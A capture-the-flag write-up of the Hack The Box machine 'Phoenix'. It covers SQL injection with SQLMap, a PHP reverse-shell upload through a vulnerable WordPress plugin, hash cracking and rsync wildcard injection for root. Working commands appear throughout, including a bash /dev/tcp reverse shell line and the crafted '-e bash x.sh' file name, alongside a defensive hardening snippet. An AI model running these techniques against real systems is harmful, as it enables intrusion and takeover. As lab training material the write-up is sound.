Phoenix is a Linux machine rated hard. It was retired a few days ago, but between end-of-semester assignments and upcoming exams I only recently found time to write it up.

Machine IP: 10.10.11.149

As always, I performed a port scan to identify the services running on the machine using Nmap.

Nmap scan report for 10.10.11.149
Host is up (0.11s latency).
Not shown: 996 closed ports
PORT     STATE    SERVICE  VERSION
22/tcp   open     ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http     Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
443/tcp  open     ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Not valid before: 2022-02-15T20:08:43
|_Not valid after:  2032-02-13T20:08:43
| tls-alpn:
|   h2
|_  http/1.1
2179/tcp filtered vmrdp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The scan showed ports 22, 80 and 443 open. Since the site on port 80 redirects to HTTPS on port 443 with the hostname phoenix.htb, I added that name to my hosts file.

Viewing the site's source showed that it runs WordPress, so I enumerated themes and plugins with WPScan.

$ wpscan --url https://phoenix.htb/ --disable-tls-checks
<REDACTED>
[+] asgaros-forum
 | Location: https://phoenix.htb/wp-content/plugins/asgaros-forum/
 | Last Updated: 2022-01-30T12:54:00.000Z
 | [!] The version is out of date, the latest version is 2.0.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.15.12 (10% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - https://phoenix.htb/wp-content/plugins/asgaros-forum/skin/widgets.css?ver=1.15.12
<REDACTED>

Since the plugin was outdated, I searched for known vulnerabilities in it and found CVE-2021-24827.

I exploited the vulnerability with SQLMap, first listing the databases:

sqlmap -u "https://phoenix.htb/forum/?subscribe_topic=1" --dbs

Suspecting more plugins were installed than WPScan had found, I used SQLMap to dump the active_plugins option from wp_options:

sqlmap -u "https://phoenix.htb/forum/?subscribe_topic=1" -D wordpress -T wp_options -C option_value --where "option_name='active_plugins'" --dump

The plugins found included:

  • accordion-slider-gallery
  • adminimize
  • asgaros-forum
  • download-from-files
  • minionrange-2-factor-authentication
  • photo-gallery-builder
  • pie-register
  • simple-local-avatars
  • timeline-event-history

Among these, the download-from-files plugin was vulnerable to arbitrary file upload. I found an exploit for this vulnerability on Exploit-DB.

I used the available exploit from Exploit-DB to upload a PHP reverse shell.

$ python3 exploit.py https://phoenix.htb/ ../rev.phtml
Download From Files <= 1.48 - Arbitrary File Upload
Author -> spacehen (www.github.com/spacehen)
Uploading Shell...
Shell Uploaded!
https://phoenix.htb/wp-admin/rev.phtml

I started a listener using Netcat, accessed the reverse shell URL, and got a connection from the machine to the listener.

After obtaining a reverse shell, I enumerated the host with LinPEAS and found the WordPress database credentials. With those I retrieved the usernames and password hashes from the wp_users table.

I cracked several of the hashes with John the Ripper and the RockYou wordlist, which gave valid SSH credentials: editor:superphoenix. However, SSH also demanded a verification code. Further enumeration turned up /etc/security/access-local.conf with the following rules:

+ : ALL : 10.11.12.13/24
- : ALL : ALL

The first rule admits logins from the 10.11.12.0/24 network and the second denies everything else, so I upgraded the reverse shell to a TTY and ran the regular SSH client from the machine itself against 10.11.12.13.

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
wp_user@phoenix:/$ ssh editor@10.11.12.13
$$$$$$$\  $$\                                     $$\
$$  __$$\ $$ |                                    \__|
$$ |  $$ |$$$$$$$\   $$$$$$\   $$$$$$\  $$$$$$$\  $$\ $$\   $$\
$$$$$$$  |$$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$ |\$$\ $$  |
$$  ____/ $$ |  $$ |$$ /  $$ |$$$$$$$$ |$$ |  $$ |$$ | \$$$$  /
$$ |      $$ |  $$ |$$ |  $$ |$$   ____|$$ |  $$ |$$ | $$  $$<
$$ |      $$ |  $$ |\$$$$$$  |\$$$$$$$\ $$ |  $$ |$$ |$$  /\$$\
\__|      \__|  \__| \______/  \_______|\__|  \__|\__|\__/  \__|
Password: superphoenix
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-96-generic x86_64)
<REDACTED>
editor@phoenix:~$ id
uid=1002(editor) gid=1002(editor) groups=1002(editor)
editor@phoenix:~$ cat user.txt
e8ba02d7b9af2<REDACTED>

After gaining SSH access as the user editor, I found that the /backups folder was writable. Further enumeration revealed a binary file cron.sh.x in /usr/local/bin.

editor@phoenix:/$ ls -l | grep backups
drwxr-x---   2 editor editor  4096 Jun 27 08:57 backups
editor@phoenix:/$ ls -l /usr/local/bin
total 16
-rwxr-xr-x 1 root root 15392 Feb 16 22:27 cron.sh.x
editor@phoenix:/$ file /usr/local/bin/cron.sh.x
/usr/local/bin/cron.sh.x: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7afde696e476ac5d8300e407cbfb9ec08a9b7f07, for GNU/Linux 3.2.0, stripped

cron.sh.x was a shell script compiled with shc. Since UnSHc could not recover it, I ran pspy64 and executed the binary to capture the script as it ran.

editor@phoenix:/tmp$ ./pspy64 &
editor@phoenix:/tmp$ /usr/local/bin/cron.sh.x
<REDACTED>
#!/bin/sh
NOW=$(date +"%Y-%m-%d-%H-%M")
FILE="phoenix.htb.$NOW.tar"
cd /backups
mysqldump -u root wordpress > dbbackup.sql
tar -cf $FILE dbbackup.sql && rm dbbackup.sql
gzip -9 $FILE
find . -type f -mmin +30 -delete
rsync --ignore-existing -t *.* jit@10.11.12.14:/backups/
<REDACTED>

From the script source, I saw that rsync is run on an unquoted *.* glob inside /backups, a directory writable by editor, so file names beginning with a dash are expanded into the command line and parsed as options. This allows wildcard injection: rsync's -e option specifies the remote shell program to execute. (Reference: https://systemweakness.com/privilege-escalation-using-wildcard-injection-tar-wildcard-injection-a57bc81df61c)
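As an added example (not the machine's own cron.sh), here is the rsync step written so that names in the backup directory cannot be parsed as options, together with a helper that audits a directory for option-looking names; the directory and destination arguments are assumptions for a stand-alone run.

```shell
#!/bin/sh
# Added example, not the machine's cron.sh: the same backup step rewritten so
# that file names in the backup directory can never be parsed as rsync options,
# plus a small audit helper. Directory and destination are passed as arguments
# (assumed values; the original hard-codes /backups and jit@10.11.12.14:/backups/).

# Expand the glob exactly as the hardened sync does: every match is prefixed
# with "./", so a file named "-e bash x.sh" becomes the path "./-e bash x.sh".
# Prints one operand per line; prints nothing when the directory has no match.
list_sync_operands() {
    ( cd "$1" || exit 1
      for f in ./*.*; do
          if [ -e "$f" ]; then printf '%s\n' "$f"; fi
      done )
}

# Hardened sync. Two independent fixes: "./" keeps each operand a path, and
# "--" tells rsync that option parsing is over, so anything after it is an
# operand even if it starts with "-". Exits 0 quietly when nothing matches.
safe_backup_sync() {
    dir="$1"
    dest="$2"
    ( cd "$dir" || exit 1
      set -- ./*.*
      [ -e "$1" ] || exit 0
      rsync --ignore-existing -t -- "$@" "$dest" )
}

# Audit helper for a directory that an unprivileged user can write to while a
# root cron job globs it: report any file whose name begins with "-".
find_option_like_names() {
    for f in "$1"/-*; do
        if [ -e "$f" ]; then printf '%s\n' "${f##*/}"; fi
    done
}
```

The real fix on this machine would also include not letting an unprivileged account write into a directory that a root job globs; the "./" and "--" changes only remove the option-injection path.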

I created a malicious script to exploit this:

editor@phoenix:/backups$ echo -e 'bash -c "bash -i >& /dev/tcp/<IP>/<PORT> 0>&1"' > x.sh
editor@phoenix:/backups$ touch -- '-e bash x.sh'
editor@phoenix:/backups$ ls
'-e bash x.sh'
<REDACTED>
x.sh

I started a listener on my local machine and waited for a connection from the machine.

$ nc -nvlp 5555
Listening on 0.0.0.0 5555
Connection received on 10.10.11.149 47634
bash: cannot set terminal process group (38509): Inappropriate ioctl for device
bash: no job control in this shell
root@phoenix:/backups# id
uid=0(root) gid=0(root) groups=0(root)
root@phoenix:/backups# cat /root/root.txt
e58a0f73b3337<REDACTED>

Rooted!